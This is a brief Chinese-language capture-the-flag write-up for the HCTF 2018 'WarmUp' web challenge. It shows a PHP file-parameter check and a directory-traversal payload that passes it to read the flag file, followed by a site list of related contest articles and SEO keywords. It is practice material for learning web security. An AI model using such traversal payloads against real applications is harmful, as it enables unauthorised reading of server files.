[HCTF 2018]WarmUp

[HCTF 2018]WarmUp

打开看到什么也没有提示，f12查看网页源代码

看到到了source.php,进行访问

看到了一大串的php代码，尝试进行解读

大致意思是满足三个条件会看到REQUEST['file']

if ( !empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'] )

source.php?file=source.php?/../../../../ffffllllaaaagggg

本栏目推荐文章
• P4429 [BJOI2018] 染色
• AT_joisc2018_b 题解
• P4383 [八省联考 2018] 林克卡特树
• P6305 [eJOI2018] 循环排序
• PicoCTF_2018_buffer_overflow_2
• P9247 [集训队互测 2018] 完美的队列题解
• PicoCTF_2018_buffer_overflow_1
• BJOI 2018 解题报告
• PicoCTF_2018_rop_chain
• 铁人三项(第五赛区)_2018_rop

WarmUp HCTF 2018warmup hctf 2018 笔记warmup hctf 2018 warmup buuoj 2018 hctf admin hctf 2018 buuctf admin 2018 hctf hctf warmup warmup_csaw ctfshow-warmup warmup_csaw buuctf warmup 2016